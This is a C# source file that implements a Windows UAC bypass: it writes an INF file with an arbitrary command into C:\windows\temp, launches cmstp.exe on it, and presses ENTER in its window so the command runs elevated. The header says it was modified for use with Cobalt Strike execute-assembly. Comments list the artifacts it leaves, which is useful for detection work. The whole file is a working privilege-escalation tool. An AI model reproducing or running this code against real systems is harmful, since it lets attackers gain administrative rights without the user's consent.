- /*
- UAC Bypass using CMSTP.exe microsoft binary
- Based on previous work from Oddvar Moe
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- And this PowerShell script of Tyler Applebaum
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
- Code author: Andre Marques (@_zc00l)
- Modified by Nicolas Heiniger to include a main and use with Cobalt Strike execute-assembly.
- */
- using System;
- using System.Reflection;
- using System.Text;
- using System.IO;
- using System.Diagnostics;
- using System.ComponentModel;
- using System.Windows;
- using System.Runtime.InteropServices;
// Assembly version stamped into the binary's metadata. The original author notes it is
// arbitrary ("fake"); it is only what the file's Properties dialog displays, so the
// string "1.6.9" is one of the static markers this build carries.
[assembly:AssemblyVersionAttribute("1.6.9")]
// Container for the CMSTP-based elevation routine described in the file header.
// It holds the INF template, two user32 P/Invoke declarations and three static helpers:
// CreateFile (write the INF), JustDoIt (launch cmstp.exe and dismiss its window) and
// SetWindowActive (find and foreground the cmstp window). Nothing in the class validates
// its input: the caller's command string is substituted into the INF verbatim.
// Artifacts this leaves, all visible in the code below: a randomly named *.inf in
// C:\windows\temp, a cmstp.exe child process started with "/au <inf path>", a console
// line naming that path, and a foreground-window change on the interactive desktop.
public class zc00l_bp
{
    // INF template handed to cmstp.exe. TO_BE_REPLACED is swapped for the caller's
    // command in CreateFile. Per the template's own comment, [RunPreSetupCommandsSection]
    // runs before setup, so the substituted command executes there and the following
    // "taskkill" line then terminates cmstp.exe. [AllUSer_LDIDSection] references
    // HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE,
    // ProfileInstallPath (whether cmstp modifies that value is not visible from this file).
    // The template lines below must stay at column 0: this is a verbatim string, so any
    // indentation would become part of the INF written to disk.
    public static string InfData = @"[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
TO_BE_REPLACED
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""CapsSVC""
ShortSvcName=""CapsSVC""
";
    // user32 imports used by SetWindowActive to bring the cmstp window to the front.
    [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
    [DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
    // Hard-coded path of the Microsoft binary that is launched; JustDoIt bails out if it is absent.
    public static string BinaryPath = "c:\\windows\\system32\\cmstp.exe";

    /* Generates a random named .inf file with command to be executed with UAC privileges */
    // Writes C:\windows\temp\<random>.inf with TO_BE_REPLACED replaced by CommandToExecute
    // (no escaping, no validation) and returns the path written. The random name comes
    // from Path.GetRandomFileName() with its extension stripped. Any I/O failure from
    // File.WriteAllText propagates to the caller.
    public static string CreateFile(string CommandToExecute)
    {
        string RandomFileName = Path.GetRandomFileName().Split(Convert.ToChar("."))[0];
        string TemporaryDir = "C:\\windows\\temp";
        StringBuilder OutputFile = new StringBuilder();
        OutputFile.Append(TemporaryDir);
        OutputFile.Append("\\");
        OutputFile.Append(RandomFileName);
        OutputFile.Append(".inf");
        // Plain text substitution: the command lands in the INF exactly as passed.
        StringBuilder newInfData = new StringBuilder(InfData);
        newInfData.Replace("TO_BE_REPLACED", CommandToExecute);
        File.WriteAllText(OutputFile.ToString(), newInfData.ToString());
        return OutputFile.ToString();
    }

    // Writes the INF for CommandToExecute, starts cmstp.exe on it, then sends ENTER to the
    // foreground window once SetWindowActive has made the cmstp window foreground.
    // Returns false only when cmstp.exe is missing at BinaryPath; otherwise true after
    // the keystroke is sent (the command's own outcome is never checked).
    public static bool JustDoIt(string CommandToExecute)
    {
        if(!File.Exists(BinaryPath))
        {
            Console.WriteLine("Binary not found!");
            return false;
        }
        // A StringBuilder holding the single INF path; InfFile.ToString() below is that path.
        StringBuilder InfFile = new StringBuilder();
        InfFile.Append(CreateFile(CommandToExecute));
        Console.WriteLine("Inf written to " + InfFile.ToString());
        // cmstp.exe /au <inf>. UseShellExecute=false means this process creates cmstp.exe
        // directly and is its parent in a process tree. The Process object returned by
        // Process.Start is neither kept nor disposed.
        ProcessStartInfo startInfo = new ProcessStartInfo(BinaryPath);
        startInfo.Arguments = "/au " + InfFile.ToString();
        startInfo.UseShellExecute = false;
        Process.Start(startInfo);
        // Busy-wait with no Sleep and no timeout until a process named "cmstp" exposes a
        // main window; if no such window ever appears this loop does not exit.
        IntPtr windowHandle = new IntPtr();
        windowHandle = IntPtr.Zero;
        do {
            windowHandle = SetWindowActive("cmstp");
        } while (windowHandle == IntPtr.Zero);
        // Fully qualified because the file imports System.Windows, not System.Windows.Forms;
        // a reference to the System.Windows.Forms assembly is still required to build.
        System.Windows.Forms.SendKeys.SendWait("{ENTER}");
        return true;
    }

    // Finds a running process named ProcessName; if the first match already has a main
    // window, brings it to the foreground (SetForegroundWindow, then ShowWindow with
    // nCmdShow 5, i.e. SW_SHOW) and returns its handle. Returns IntPtr.Zero when no such
    // process exists or its MainWindowHandle is still zero. Only target[0] is considered;
    // other same-named processes are ignored, and the Process objects are not disposed.
    public static IntPtr SetWindowActive(string ProcessName)
    {
        Process[] target = Process.GetProcessesByName(ProcessName);
        if(target.Length == 0) return IntPtr.Zero;
        // Refresh so a window created after the Process object was populated is seen.
        target[0].Refresh();
        IntPtr WindowHandle = new IntPtr();
        WindowHandle = target[0].MainWindowHandle;
        if(WindowHandle == IntPtr.Zero) return IntPtr.Zero;
        // Return values of both Win32 calls are ignored.
        SetForegroundWindow(WindowHandle);
        ShowWindow(WindowHandle, 5);
        return WindowHandle;
    }

    // Entry point: args[0] is the command handed to JustDoIt; any further arguments are
    // ignored. JustDoIt's bool result is dropped, so the exit code does not reflect it
    // (it is 0 unless an exception escapes).
    static void Main(string[] args)
    {
        if (args.Length != 0)
        {
            JustDoIt(args[0]);
        }
        else
        {
            Console.WriteLine("Please provide a command to run.");
        }
    }
}